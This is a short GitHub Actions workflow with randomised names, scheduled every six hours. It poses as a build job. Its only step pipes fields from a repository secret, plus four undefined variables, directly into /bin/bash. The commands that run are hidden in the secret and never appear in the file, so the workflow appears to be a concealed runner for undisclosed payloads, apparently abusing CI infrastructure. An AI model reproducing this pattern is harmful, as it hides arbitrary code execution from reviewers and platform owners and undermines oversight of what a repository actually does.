name: humoxi8192

on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: humoxi8192
        env:
          diz06: ${{ secrets.diz06 }}
        run: |
          echo $diz06 | jq -r .hdu96944 | /bin/bash
          echo $l99132 | jq -r .z90435 | /bin/bash
          echo $gjs5904 | jq -r .zkn7 | /bin/bash
          echo $f7854 | jq -r .bhnrm643 | /bin/bash
          echo $dbkst039 | jq -r .tziq52610 | /bin/bash

